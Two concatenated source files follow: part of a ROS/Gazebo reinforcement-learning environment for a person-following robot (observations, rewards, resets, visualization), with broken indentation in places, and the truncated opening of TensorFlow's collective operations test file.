            # if mode_person == 0:
            #     person_thread = threading.Thread(target=self.person.go_to_goal, args=())
            #     person_thread.start()
            if self.use_goal and not self.use_movebase:
                self.robot_thread = threading.Thread(target=self.robot.go_to_goal, args=())
                self.robot_thread.start()
            for idx in range (idx_start, len(self.path["points"])-3):
                point = (self.path["points"][idx][0], self.path["points"][idx][1])
                self.current_path_idx = idx
                counter_pause = 0
                # Spin while paused; give up (and release the lock) on reset
                # or after ~200 pause polls.
                while self.is_pause:
                    counter_pause+=1
                    rospy.loginfo("pause in path follower")
                    if self.is_reseting or counter_pause > 200:
                        # if mode_person == 0:
                        #     person_thread.join()
                        self.lock.release()
                        return
                    time.sleep(0.001)
                try:
                    # Modes <= 6 loop internally until pause/reset; mode 7
                    # walks the person point-to-point along the path.
                    if mode_person <= 6:
                        self.person.use_selected_person_mod(mode_person)
                    else:
                        self.person.go_to_pos(point, stop_after_getting=True)
                        time.sleep(0.001)
                    # person_thread.start()
                    # if self.robot_mode == 1:
                    #     noisy_point = (self.path["points"][idx+3][0] +min(max(np.random.normal(),-0.5),0.5), self.path["points"][idx+3][1] +min(max(np.random.normal(),-0.5),0.5))
                    #     robot_thread = threading.Thread(target=self.robot.go_to_pos, args=(noisy_point,True,))
                    #     robot_thread.start()
                    #     robot_thread.join()
                    # person_thread.join()
                except Exception as e:
                    rospy.logerr("path follower {}, {}".format(self.is_reseting, e))
                    traceback.print_exc()
                    break
                if self.is_reseting:
                    self.person.stop_robot()
                    break
            self.lock.release()
            rospy.loginfo("path follower release the lock")
            self.path_finished = True
        else:
            rospy.loginfo("problem in getting the log in path follower")
        # robot.stop_robot()
def get_laser_scan(self):
return self.robot.get_laser_image()
def get_laser_scan_all(self):
images = self.robot.scan_image_history.get_elemets()
counter = 0
while len(images)!=self.robot.scan_image_history.window_size and counter<250:
images = self.robot.scan_image_history.get_elemets()
time.sleep(0.005)
counter +=1
if counter > 100:
rospy.loginfo("wait for laser scan to get filled sec: {}/25".format(counter / 10))
if counter>=250:
raise RuntimeError(
'exception while calling get_laser_scan:')
images = np.asarray(images)
return (images.reshape((images.shape[1], images.shape[2], images.shape[0])))
    def get_observation(self):
        """Build the flat observation vector for the policy.

        Waits for all history buffers to fill (returns None if the env is
        resetting meanwhile), then concatenates: the robot's and person's
        position histories expressed relative to the robot's reference and
        scaled by 1/6, the normalized velocities, optionally the relative
        heading, and the previous action.  Gaussian noise is added when
        use_noise is set.
        """
        # got_laser = False
        # while not got_laser:
        #     try:
        #         laser_all = self.get_laser_scan_all()
        #         got_laser = True
        #     except Exception as e:
        #         rospy.logerr("laser_error reseting")
        #         # self.reset(reset_gazebo = True)
        while self.robot.pos_history.avg_frame_rate is None or self.person.pos_history.avg_frame_rate is None or self.robot.velocity_history.avg_frame_rate is None or self.person.velocity_history.avg_frame_rate is None:
            if self.is_reseting:
                return None
            time.sleep(0.001)
        pos_his_robot = np.asarray(self.robot.pos_history.get_elemets())
        heading_robot = self.robot.state_["orientation"]
        pos_his_person = np.asarray(self.person.pos_history.get_elemets())
        heading_person = self.person.state_["orientation"]
        robot_vel = np.asarray(self.robot.get_velocity())
        person_vel = np.asarray(self.person.get_velocity())
        poses = np.concatenate((pos_his_robot, pos_his_person))
        if self.use_noise:
            # Training-time sensor noise on positions, headings, velocities.
            poses += np.random.normal(loc=0, scale=0.1, size=poses.shape)
            heading_robot += np.random.normal(loc=0, scale=0.2)
            heading_person += np.random.normal(loc=0, scale=0.2)
            robot_vel += np.random.normal(loc=0, scale=0.1, size=robot_vel.shape)
            person_vel += np.random.normal(loc=0, scale=0.1, size=person_vel.shape)
        heading_relative = GazeborosEnv.wrap_pi_to_pi(heading_robot-heading_person)/(math.pi)
        pos_rel = []
        for pos in (poses):
            relative = GazeborosEnv.get_relative_position(pos, self.robot.relative)
            pos_rel.append(relative)
        pos_history = np.asarray(np.asarray(pos_rel)).flatten()/6.0
        #TODO: make the velocity normalization better
        velocities = np.concatenate((person_vel, robot_vel))/self.robot.max_angular_vel
        if self.use_orientation_in_observation:
            velocities_heading = np.append(velocities, heading_relative)
        else:
            velocities_heading = velocities
        final_ob = np.append(np.append(pos_history, velocities_heading), self.prev_action)
        return final_ob
    def __del__(self):
        """Finalizer: nothing to release yet."""
        # todo
        return
    def visualize_observation(self):
        """Publish debug images of the position histories (relative and GT).

        NOTE(review): this publishes via self.bridge / self.image_pub /
        self.image_pub_gt, whose creation is commented out in __init__ --
        calling this as-is would raise AttributeError; confirm they are
        enabled elsewhere before use.
        """
        observation_image = np.zeros([2000,2000,3])
        observation_image_gt = np.zeros([2000,2000,3])
        observation_image = observation_image.astype(np.uint8)
        observation_image_gt = observation_image_gt.astype(np.uint8)
        observation_image.fill(255)
        observation_image_gt.fill(255)
        # Wait for the history buffers to fill; abort during a reset.
        while self.robot.pos_history.avg_frame_rate is None or self.person.pos_history.avg_frame_rate is None or self.robot.velocity_history.avg_frame_rate is None or self.person.velocity_history.avg_frame_rate is None:
            if self.is_reseting:
                return None
            time.sleep(0.001)
        pos_his_robot = self.robot.pos_history.get_elemets()
        heading_robot = self.robot.state_["orientation"]
        pos_his_person = self.person.pos_history.get_elemets()
        heading_person = self.person.state_["orientation"]
        heading_relative = GazeborosEnv.wrap_pi_to_pi(heading_robot-heading_person)/(math.pi)
        center_pos = pos_his_robot[-1]
        # Robot history in blue: relative frame on one image, ground truth
        # (centred on the newest robot position) on the other.
        for pos in pos_his_robot:
            relative = GazeborosEnv.get_relative_position(pos, self.robot)
            pos_rel = GazeborosEnv.to_image_coordinate(relative, (0, 0))
            pos_gt = GazeborosEnv.to_image_coordinate(pos, center_pos)
            observation_image = self.add_circle_observation_to_image(relative, (255, 0, 0), 10, center_pos=(0,0), image=observation_image)
            observation_image_gt = self.add_circle_observation_to_image(pos, (255, 0, 0), 10, center_pos=center_pos, image=observation_image_gt)
        # Person history in green, same two frames.
        for pos in pos_his_person:
            relative = GazeborosEnv.get_relative_position(pos, self.robot)
            pos_rel = GazeborosEnv.to_image_coordinate(relative, (0, 0))
            pos_gt = GazeborosEnv.to_image_coordinate(pos, center_pos)
            observation_image = self.add_circle_observation_to_image(relative, (0, 255, 0), 10, image = observation_image, center_pos=(0,0))
            observation_image_gt = self.add_circle_observation_to_image(pos, (0, 255, 0), 10, image=observation_image_gt, center_pos=center_pos)
        self.image_pub.publish(self.bridge.cv2_to_imgmsg(observation_image, encoding="bgr8"))
        self.image_pub_gt.publish(self.bridge.cv2_to_imgmsg(observation_image_gt, encoding="bgr8"))
@staticmethod
def to_image_coordinate(pos, center_pos):
return (int((pos[0] - center_pos[0])*50+1000), int((pos[1] - center_pos[1])*50+1000))
def add_line_observation_to_image(self, pos, pos2):
    """Draw a 1-px line between two world positions on the rolling
    observation image, using the current visualization color.

    Logs an error and draws nothing if the start point falls outside the
    2000x2000 canvas.
    """
    color = self.colors_visualization[self.color_index]
    start = GazeborosEnv.to_image_coordinate(pos, self.center_pos_)
    end = GazeborosEnv.to_image_coordinate(pos2, self.center_pos_)
    if not (0 <= start[0] <= 2000 and 0 <= start[1] <= 2000):
        rospy.logerr("problem with observation: {}".format(start))
        return
    self.new_obsevation_image_ = cv.line(
        self.new_obsevation_image_,
        (start[0], start[1]), (end[0], end[1]), color, 1)
def add_triangle_observation_to_image(self, pos, orientation):
    """Draw a filled triangle at world position *pos* pointing along
    *orientation* (radians) on the rolling observation image.

    The tip is 0.3 world units ahead of *pos*; the two base corners are
    0.1 units to either side. Logs an error and draws nothing if any corner
    falls outside the 2000x2000 canvas.
    """
    color = self.colors_visualization[self.color_index]
    tip = GazeborosEnv.to_image_coordinate((pos[0]+math.cos(orientation)*0.3, pos[1]+math.sin(orientation)*0.3), self.center_pos_)
    left = GazeborosEnv.to_image_coordinate((pos[0]+math.cos(orientation+math.pi/2)*0.1, pos[1]+math.sin(orientation+math.pi/2)*0.1), self.center_pos_)
    right = GazeborosEnv.to_image_coordinate((pos[0]+math.cos(orientation-math.pi/2)*0.1, pos[1]+math.sin(orientation-math.pi/2)*0.1), self.center_pos_)
    corners = [tip, left, right]
    # Fixes: removed leftover debug print of the corner list, removed an
    # unused pos_image computation, and renamed the loop variable so it no
    # longer shadows the `pos` parameter.
    for corner in corners:
        if corner[0] > 2000 or corner[0] < 0 or corner[1] > 2000 or corner[1] < 0:
            rospy.logerr("problem with observation: {}".format(corner))
            return
    self.new_obsevation_image_ = cv.drawContours(self.new_obsevation_image_, [np.asarray(corners)], 0, color, -1)
def add_arrow_observation_to_image(self, pos, orientation):
    """Draw an arrow starting at world position *pos*, pointing along
    *orientation* (radians), 0.3 world units long.

    Logs an error and draws nothing if the tail falls outside the
    2000x2000 canvas.
    """
    color = self.colors_visualization[self.color_index]
    tail = GazeborosEnv.to_image_coordinate(pos, self.center_pos_)
    head = GazeborosEnv.to_image_coordinate(
        (pos[0] + math.cos(orientation) * 0.3,
         pos[1] + math.sin(orientation) * 0.3),
        self.center_pos_)
    if not (0 <= tail[0] <= 2000 and 0 <= tail[1] <= 2000):
        rospy.logerr("problem with observation: {}".format(tail))
        return
    self.new_obsevation_image_ = cv.arrowedLine(
        self.new_obsevation_image_,
        (tail[0], tail[1]), (head[0], head[1]), color, 2, tipLength=0.5)
def add_circle_observation_to_image(self, pos, color, radious, center_pos=None, image=None):
    """Draw a circle of radius *radious* (px) at world position *pos*.

    *image* defaults to the rolling observation image and *center_pos* to
    the stored canvas centre. Returns the drawn-on image, or None (after
    logging) if the point falls outside the 2000x2000 canvas.
    """
    target = self.new_obsevation_image_ if image is None else image
    origin = self.center_pos_ if center_pos is None else center_pos
    pixel = GazeborosEnv.to_image_coordinate(pos, origin)
    if not (0 <= pixel[0] <= 2000 and 0 <= pixel[1] <= 2000):
        rospy.logerr("problem with observation: {}".format(pixel))
        return
    return cv.circle(target, (pixel[0], pixel[1]), radious, color, 2)
def get_supervised_action(self):
    """Compute a supervision target action from the person's predicted path.

    Waits (polling at 10 Hz) until the person's state is ready; returns a
    zero action array immediately if a reset begins while waiting.

    Returns:
        np.ndarray of (x_norm, y_norm, orientation_norm): the point 1.5 s
        ahead of the person, in the robot-relative frame, normalised by
        the robot's max relative position range; orientation is the bearing
        from the person to that point, normalised by pi.
    """
    while not self.person.is_current_state_ready() and not self.is_reseting:
        time.sleep(0.1)
    if self.is_reseting:
        return np.asarray([0,0])
    self.use_supervise_action = True
    pos = self.person.calculate_ahead(1.5)
    pos_person = self.person.get_pos()
    pos_relative = GazeborosEnv.get_relative_position(pos, self.robot.relative)
    pos_person_relative = GazeborosEnv.get_relative_position(pos_person, self.robot.relative)
    # BUG FIX: the original f-string used literal brackets ("[pos]"), so it
    # printed the variable names instead of their values.
    print(f"pos {pos} pos_person {pos_person} pos_relative {pos_relative}")
    pos_norm = GazeborosEnv.normalize(pos_relative, self.robot.max_rel_pos_range)
    orientation = GazeborosEnv.normalize(math.atan2(pos_relative[1] - pos_person_relative[1], pos_relative[0] - pos_person_relative[0]), math.pi)
    return np.asarray((pos_norm[0], pos_norm[1], orientation))
def update_observation_image(self):
    """Overlay the current robot/person/goal markers onto the rolling
    observation image, alpha-blending with the previous frame so that
    older poses fade over time.
    """
    self.new_obsevation_image_ = np.copy(self.current_obsevation_image_)
    robot_pos = self.robot.get_pos()
    robot_orientation = self.robot.get_orientation()
    person_pos = self.person.get_pos()
    person_orientation = self.person.get_orientation()
    if self.use_goal:
        current_goal = self.robot.get_goal()
    # Bail out if either agent has not reported an orientation yet.
    if person_orientation is None or robot_orientation is None:
        rospy.logerr("person or robot orientation is None")
        return
    if self.first_call_observation:
        # self.new_obsevation_image_ = self.add_circle_observation_to_image(robot_pos, [152,100,100], 10)
        # self.new_obsevation_image_ = self.add_circle_observation_to_image(person_pos,[0,100,100], 10)
        self.first_call_observation = False
    if self.is_collided():
        # Highlight both agents when a collision is detected.
        self.new_obsevation_image_ = self.add_circle_observation_to_image(robot_pos, [152,200,200], 10)
        self.new_obsevation_image_ = self.add_circle_observation_to_image(person_pos,[200,100,100], 10)
    # Robot is drawn as an arrow, person as a filled triangle.
    self.add_arrow_observation_to_image(robot_pos, robot_orientation)
    self.add_triangle_observation_to_image(person_pos, person_orientation)
    if self.use_goal:
        if self.use_movebase:
            goal_orientation = current_goal["orientation"]
        else:
            goal_orientation = robot_orientation
        # NOTE(review): goal_orientation is computed but only the goal
        # position is actually drawn below.
        self.add_circle_observation_to_image(current_goal["pos"], self.colors_visualization[self.color_index], 5)
        #self.add_line_observation_to_image(robot_pos, current_goal["pos"])
    else:
        self.add_line_observation_to_image(robot_pos, person_pos)
    # 50/50 blend of the new markers into the persistent image.
    alpha = 0.50
    self.current_obsevation_image_ = cv.addWeighted(self.new_obsevation_image_, alpha, self.current_obsevation_image_, 1 - alpha, 0)
def get_current_observation_image(self):
    """Return the persistent trajectory image with values scaled to [0, 1].

    In testing mode the current trajectory is also persisted to disk via
    save_current_path().
    """
    if self.is_testing:
        self.save_current_path()
    return self.current_obsevation_image_ / 255.
def take_action(self, action):
    """Forward *action* to the robot and periodically refresh the debug
    overlay image.

    The first two action components are remembered as prev_action. The
    overlay is redrawn only every 7th call (throttled by
    wait_observation_), advancing the visualization color each time.
    """
    self.prev_action = action[:2]
    self.robot.take_action(action)
    if self.wait_observation_ <= 0:
        self.update_observation_image()
        self.wait_observation_ = 7
        # Advance the color, clamped to the last available entry.
        self.color_index = min(self.color_index + 2,
                               len(self.colors_visualization) - 1)
    self.wait_observation_ -= 1
    return
def is_skip_run(self):
    """Return True when the episode should be discarded (robot fell)."""
    return bool(self.fallen)
def is_successful(self):
    """An episode succeeds when it ended without a collision, without
    exceeding the maximum person-robot distance, and without falling."""
    failed = self.is_collided() or self.is_max_distance or self.fallen
    return not failed
def step(self, action):
    """Standard Gym step: apply *action*, wait one control period, then
    compute the reward, observation and termination conditions.

    Returns:
        (observation, reward, episode_over, info_dict) with reward clipped
        to [-1, 1].
    """
    self.number_of_steps += 1
    self.take_action(action)
    # instead of one reward get all the reward during wait
    # rospy.sleep(0.4)
    sleep_time = 0.10
    rewards = []
    if sleep_time > 0.1:
        # Sample the reward 10 times over the wait and average.
        # (Dead branch with the current sleep_time of exactly 0.10.)
        for t in range (10):
            rospy.sleep(sleep_time/10.)
            rewards.append(self.get_reward())
        reward = np.mean(rewards)
    else:
        rospy.sleep(sleep_time)
        reward = self.get_reward()
    ob = self.get_observation()
    episode_over = False
    rel_person = GazeborosEnv.get_relative_heading_position(self.robot, self.person)[1]
    distance = math.hypot(rel_person[0], rel_person[1])
    if self.path_finished:
        rospy.loginfo("path finished")
        episode_over = True
    # Termination checks; the debug overlay is refreshed on each.
    if self.is_collided():
        self.update_observation_image()
        episode_over = True
        rospy.loginfo('collision happened episode over')
        reward -= 0.5
    elif distance > 5:
        # Robot lost the person.
        self.update_observation_image()
        self.is_max_distance = True
        episode_over = True
        rospy.loginfo('max distance happened episode over')
    elif self.number_of_steps > self.max_numb_steps:
        self.update_observation_image()
        episode_over = True
    if self.fallen:
        episode_over = True
        rospy.loginfo('fallen')
    # Clip the (possibly penalised) reward to [-1, 1].
    reward = min(max(reward, -1), 1)
    if self.agent_num == 0:
        rospy.loginfo("action {} reward {}".format(action, reward))
    if episode_over:
        # Signal the person controller that the episode ended.
        self.person.reset = True
    #reward += 1
    return ob, reward, episode_over, {}
def is_collided(self):
    """True when the robot is within collision_distance of the person or
    its own collision flag is set."""
    rel = GazeborosEnv.get_relative_heading_position(self.robot, self.person)[1]
    too_close = math.hypot(rel[0], rel[1]) < self.collision_distance
    return bool(too_close or self.robot.is_collided)
def get_distance(self):
    """Euclidean distance between the robot and the person."""
    _, rel = GazeborosEnv.get_relative_heading_position(self.robot, self.person)
    return math.hypot(rel[0], rel[1])
def get_angle_person_robot(self):
    """Bearing of the robot relative to the person, wrapped to [-pi, pi]."""
    _, rel = GazeborosEnv.get_relative_heading_position(self.robot, self.person)
    return GazeborosEnv.wrap_pi_to_pi(math.atan2(rel[1], rel[0]))
def get_reward(self):
    """Shaped reward combining distance-keeping around best_distance and
    angular alignment with the person, clipped to [-1, 1].
    """
    reward = 0
    angle_robot_person, pos_rel = GazeborosEnv.get_relative_heading_position(self.robot, self.person)
    # Bearing of the robot as seen from the person, in degrees.
    # (Overwrites the heading returned above.)
    angle_robot_person = math.atan2(pos_rel[1], pos_rel[0])
    angle_robot_person = np.rad2deg(GazeborosEnv.wrap_pi_to_pi(angle_robot_person))
    distance = math.hypot(pos_rel[0], pos_rel[1])
    # Negative reward for being behind the person
    if self.is_collided():
        reward -= 1
    if distance < 0.5:
        # Dangerously close: overrides anything accumulated so far
        # (assignment, not decrement) before clipping.
        reward = -1.3
    elif abs(distance - self.best_distance) < 0.5:
        # Inside the +/-0.5 band around best_distance: up to +0.25 bonus.
        reward += 0.5 * (0.5 - abs(distance - self.best_distance))
    elif distance >= self.best_distance+0.5:
        # Linearly penalise being too far.
        reward -= 0.25 * (distance - (self.best_distance+0.5))
    elif distance < self.best_distance-0.5:
        # Linearly penalise being too close (but above 0.5).
        reward -= (self.best_distance - 0.5 - distance)/(self.best_distance - 0.5)
    if abs(angle_robot_person) < 25:
        # Up to +0.5 for being within 25 degrees of the person's front.
        reward += 0.5 * (25 - abs(angle_robot_person)) / 25
    else:
        reward -= 0.25 * abs(angle_robot_person) / 180
    if abs(distance - self.best_distance) < 0.5 and abs(angle_robot_person) < 25:
        # Extra bonus for satisfying both distance and angle criteria.
        reward += 0.25
    # if not 90 > angle_robot_person > 0:
    #     reward -= distance/6.0
    # elif self.min_distance < distance < self.max_distance:
    #     reward += 0.1 + (90 - angle_robot_person) * 0.9 / 90
    # elif distance < self.min_distance:
    #     reward -= 1 - distance / self.min_distance
    # else:
    #     reward -= distance / 7.0
    reward = min(max(reward, -1), 1)
    # ToDO check for obstacle
    return reward
def save_log(self):
    """Pickle both agents' trajectory histories to the log file and close it."""
    payload = {"person_history": self.person.log_history,
               "robot_history": self.robot.log_history}
    pickle.dump(payload, self.log_file)
    self.log_file.close()
def reset(self, reset_gazebo=False):
    """Reset the episode: flag both agents for reset, flush evaluation logs,
    and re-initialise the simulator under the environment lock.

    Retries (recursively) if init_simulator() raises a RuntimeError.
    Returns the first observation of the new episode.
    """
    self.is_pause = True
    self.is_reseting = True
    self.robot.reset = True
    self.person.reset = True
    rospy.loginfo("trying to get the lock for reset")
    # if reset_gazebo:
    #     self.reset_gazebo()
    with self.lock:
        rospy.loginfo("got the lock")
        not_init = True
        try:
            if self.is_evaluation_:
                # Flush the finished episode's log and advance to the next
                # evaluation path; exit the process once all paths are done.
                if self.log_file is not None:
                    pickle.dump({"person_history":self.person.log_history, "robot_history":self.robot.log_history}, self.log_file)
                    self.log_file.close()
                self.path_idx += 1
                print ("start path_id: {}".format(self.path_idx))
                if self.path_idx < len(self.paths)-1:
                    self.path = self.paths[self.path_idx]
                    self.log_file = open(self.path["name"], "wb")
                else:
                    print ("all done")
                    self.person.stop_robot()
                    exit(0)
            self.init_simulator()
            not_init = False
        except RuntimeError as e:
            rospy.logerr("error happend reseting: {}".format(e))
    # Retry outside the lock so the recursive call can re-acquire it.
    if not_init:
        rospy.loginfo("not init so run reset again")
        return (self.reset())
    else:
        rospy.sleep(2)
        return self.get_observation()
def save_current_path(self):
    """Pickle the accumulated robot/person trajectories for the current
    path-follower test setting, then clear both pose buffers.

    The file name encodes the control mode (base_/planner_/cmd_) plus the
    current test-setting label, under data/traj_simulations/.
    """
    robot_poses = self.robot.all_pose_
    person_poses = self.person.all_pose_
    directory = "data/traj_simulations"
    if self.use_goal:
        prefix = "base_" if self.use_supervise_action else "planner_"
    else:
        prefix = "cmd_"
    name = prefix + self.path_follower_test_settings[self.path_follower_current_setting_idx][2]
    os.makedirs(directory, exist_ok=True)
    with open(os.path.join(directory, name + ".pkl"), "wb") as f:
        pickle.dump({"robot": robot_poses, "person": person_poses, "name": name}, f)
    self.robot.all_pose_ = []
    self.person.all_pose_ = []
def next_setting(self):
    """Advance to the next path-follower test configuration."""
    self.path_follower_current_setting_idx = self.path_follower_current_setting_idx + 1
def is_finish(self):
    """True once the setting index has reached the last test setting."""
    last_idx = len(self.path_follower_test_settings) - 1
    return self.path_follower_current_setting_idx >= last_idx
def render(self, mode='human', close=False):
    """Gym render hook — a no-op here; the viewer only supports human mode,
    and visualization is done via the ROS image topics instead."""
    return
def calculate_rechability_derivite(self, x, y, v, theta):
    """Look up the reachability value grid at (x, y, v, theta) and return
    forward-difference derivatives w.r.t. velocity and heading plus the
    grid value itself.

    (Method name spelling kept as-is for caller compatibility.)

    Returns:
        (derivative_v, derivative_theta, value) — all read from
        self.reachabilit_value, a 4-D grid indexed [x, y, v, theta].
    """
    get_idx = lambda x: int(math.floor(x))
    # Normalise each coordinate (extra True flag — presumably maps into
    # [0, 1]; verify against GazeborosEnv.normalize) then scale to indices.
    pos_norm = GazeborosEnv.normalize((x, y), self.robot.max_rel_pos_range, True)
    orientation_norm = GazeborosEnv.normalize(theta, math.pi, True)
    velocity_norm = GazeborosEnv.normalize(v, self.robot.max_linear_vel, True)
    x_idx = get_idx(pos_norm[0]*(self.reachabilit_value.shape[0]-1))
    y_idx = get_idx(pos_norm[1]*(self.reachabilit_value.shape[1]-1))
    orientation_idx = get_idx(orientation_norm * (self.reachabilit_value.shape[3] -1))
    v_idx = get_idx(velocity_norm * (self.reachabilit_value.shape[2]-1))
    rospy.loginfo("x: {} y: {} theta {}".format(x_idx, y_idx, orientation_idx))
    # Clamp v/theta to shape-2 so the +1 forward differences stay in bounds;
    # x/y only need to stay within the grid.
    v_idx = max(min(v_idx, self.reachabilit_value.shape[2]-2), 0)
    orientation_idx = max(min(orientation_idx, self.reachabilit_value.shape[3]-2), 0)
    x_idx = max(min(x_idx, self.reachabilit_value.shape[0]-1), 0)
    y_idx = max(min(y_idx, self.reachabilit_value.shape[1]-1), 0)
    # Forward differences divided by 2 (half-step scaling as written).
    derivative_v = (self.reachabilit_value[x_idx, y_idx, v_idx+1, orientation_idx] -\
                    self.reachabilit_value[x_idx, y_idx, v_idx, orientation_idx])/2
    derivative_theta = (self.reachabilit_value[x_idx, y_idx, v_idx, orientation_idx+1] -\
                        self.reachabilit_value[x_idx, y_idx, v_idx, orientation_idx])/2
    rospy.loginfo("x: {} y: {} theta {}".format(x_idx, y_idx, orientation_idx))
    return derivative_v, derivative_theta, self.reachabilit_value[x_idx, y_idx, v_idx, orientation_idx]
def reachability_action(self):
    """Bang-bang control derived from the reachability value gradient.

    Returns a [linear, angular] action of +/-1 following the sign of the
    respective derivative, or [0, 0] when the reachability value is >= 1.
    """
    relative = GazeborosEnv.get_relative_position(self.robot.get_pos(), self.person)
    orientation = GazeborosEnv.wrap_pi_to_pi(self.robot.get_orientation() - self.person.get_orientation())
    # Console diagnostics (degrees) for manual debugging.
    print (np.rad2deg(orientation), np.rad2deg(self.person.get_orientation()), np.rad2deg(self.robot.get_orientation()) )
    velocity = self.robot.get_velocity()[0]
    derivative_v, derivative_theta, v = self.calculate_rechability_derivite(relative[0], relative[1], velocity, orientation)
    rospy.loginfo("d_v: {:0.5f} W: {:0.5f} v {:0.1f}".format(derivative_v, derivative_theta, v))
    action = [0,0]
    # Only act while the reachability value is below 1.
    if v<1:
        if derivative_v > 0:
            action[0] = 1
        else:
            action[0] = -1
        if derivative_theta > 0:
            action[1] = 1
        else:
            action[1] = -1
    return action
#def read_bag():
# gazeboros_n = GazeborosEnv()
# gazeboros_n.set_agent(0)
#
# while gazeboros_n.robot.prev_call_gazeboros_ is None or rospy.Time.now().to_sec() - gazeboros_n.robot.prev_call_gazeboros_ < 5:
# rospy.sleep(0.1)
# gazeboros_n.save_log()
# print("done")
#read_bag()
def test():
    """Manual smoke test: instantiate the environment and print relative
    pose/heading/reward diagnostics once per second, forever."""
    gazeboros_env = GazeborosEnv()
    gazeboros_env.set_agent(0)
    step = 0
    while (True):
        step +=1
        #action = gazeboros_env.get_supervised_action()
        #action = gazeboros_env.reachability_action()
        #gazeboros_env.step(action)
        # Relative position of the robot w.r.t. the person, two ways.
        rel_person = GazeborosEnv.get_relative_heading_position(gazeboros_env.robot, gazeboros_env.person)[1]
        relative_pos2 = GazeborosEnv.get_relative_position(gazeboros_env.robot.get_pos(), gazeboros_env.robot.relative)
        orientation1 = np.rad2deg(np.arctan2(rel_person[1], rel_person[0]))
        distance = math.hypot(relative_pos2[0], relative_pos2[1])
        heading_robot = gazeboros_env.robot.state_["orientation"]
        heading_person = gazeboros_env.person.state_["orientation"]
        heading_relative = GazeborosEnv.wrap_pi_to_pi(heading_robot-heading_person)
        orientation_heading = np.rad2deg(heading_relative)
        #print (f"ob: {gazeboros_env.get_observation()}")
        print (f"reward: {gazeboros_env.get_reward()}")
        print (f"pos: {rel_person} vs {relative_pos2}")
        print (f"orientation_h: {orientation_heading} dist: {distance} orin: {orientation1}")
        print (f"orientation_robo: {np.rad2deg(heading_robot)} orintation pers: {np.rad2deg(heading_person)}")
        print ("\n\n")
        #if step % 50==0:
        #    print("reseting")
        #    gazeboros_env.reset()
        #gazeboros_env.visualize_observation()
        rospy.sleep(1)
#test()
|
collective_ops_test.py | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for V2 Collective Operations."""
import os
import threading
import time
from absl.testing import parameterized
from tensorflow.python.compat import v2_compat
from tensorflow.python.data.experimental.ops import testing as dataset_testing
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import test_util
from tensorflow.python.eager import cancellation
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import collective_ops as _collective_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.platform import test
class CollectiveOpsV1(object):
  """Namespace exposing the V1 collective op entry points, so tests can be
  parameterized over op versions with a uniform interface."""
  all_reduce = _collective_ops.all_reduce
  all_gather = _collective_ops.all_gather
  broadcast_send = _collective_ops.broadcast_send
  broadcast_recv = _collective_ops.broadcast_recv
class CollectiveOpsV2(object):
  """Wrappers over the V2 collective ops with the same call signature as
  CollectiveOpsV1. Scalar parameters are passed through identity so they
  become tensors, matching how V2 ops take runtime inputs."""

  @staticmethod
  def all_reduce(t, group_size, group_key, instance_key, *args, **kwargs):
    """V2 all-reduce with tensorized group/instance parameters."""
    group_size = array_ops.identity(group_size)
    group_key = array_ops.identity(group_key)
    instance_key = array_ops.identity(instance_key)
    return _collective_ops.all_reduce_v2(t, group_size, group_key, instance_key,
                                         *args, **kwargs)

  @staticmethod
  def all_gather(t, group_size, group_key, instance_key, *args, **kwargs):
    """V2 all-gather with tensorized group/instance parameters."""
    group_size = array_ops.identity(group_size)
    group_key = array_ops.identity(group_key)
    instance_key = array_ops.identity(instance_key)
    return _collective_ops.all_gather_v2(t, group_size, group_key, instance_key,
                                         *args, **kwargs)

  @staticmethod
  def broadcast_send(t, shape, dtype, group_size, group_key, instance_key,
                     *args, **kwargs):
    """V2 broadcast send; note shape/dtype are accepted but not forwarded
    (the V2 op infers them from *t*)."""
    group_size = array_ops.identity(group_size)
    group_key = array_ops.identity(group_key)
    instance_key = array_ops.identity(instance_key)
    return _collective_ops.broadcast_send_v2(t, group_size, group_key,
                                             instance_key, *args, **kwargs)

  @staticmethod
  def broadcast_recv(shape, dtype, group_size, group_key, instance_key, *args,
                     **kwargs):
    """V2 broadcast receive; shape is also tensorized."""
    group_size = array_ops.identity(group_size)
    group_key = array_ops.identity(group_key)
    instance_key = array_ops.identity(instance_key)
    shape = array_ops.identity(shape)
    return _collective_ops.broadcast_recv_v2(
        shape, dtype, group_size, group_key, instance_key, *args, **kwargs)
# Device/communication matrix: CPU with RING, and 2-GPU with RING and NCCL.
device_combination = (
    combinations.combine(device='CPU', communication='RING', required_gpus=0) +
    combinations.combine(
        device='GPU', communication=['RING', 'NCCL'], required_gpus=2))

# Both V1 and V2 variants of all-reduce/all-gather, for tests that are
# agnostic to the op version.
collective_op_combinations = combinations.combine(collective_op=[
    combinations.NamedObject('all_reduce', CollectiveOpsV1.all_reduce),
    combinations.NamedObject('all_reduce_v2', CollectiveOpsV2.all_reduce),
    combinations.NamedObject('all_gather', CollectiveOpsV1.all_gather),
    combinations.NamedObject('all_gather_v2', CollectiveOpsV2.all_gather)
])
@combinations.generate(
    combinations.times(
        combinations.combine(
            collective_ops=[
                combinations.NamedObject('v1', CollectiveOpsV1),
                combinations.NamedObject('v2', CollectiveOpsV2)
            ],
            mode='eager'), device_combination))
class CollectiveOpsTest(test.TestCase, parameterized.TestCase):
  """Basic functional tests, run against both V1 and V2 collective ops."""

  def setUp(self):
    _setup_context()
    super().setUp()

  def testReduce(self, collective_ops, device, communication):
    """All-reduce sums across group members (group sizes 1 and 2)."""
    dev0 = '/device:%s:0' % device
    dev1 = '/device:%s:1' % device

    @def_function.function
    def run_all_reduce_1device():
      with ops.device(dev0):
        in_value = constant_op.constant([1.])
        group_size = 1
        group_key = 1
        instance_key = 1
        return collective_ops.all_reduce(
            in_value,
            group_size,
            group_key,
            instance_key,
            communication_hint=communication)

    @def_function.function
    def run_all_reduce_2devices():
      in_value = constant_op.constant([1.])
      group_size = 2
      group_key = 2
      instance_key = 2
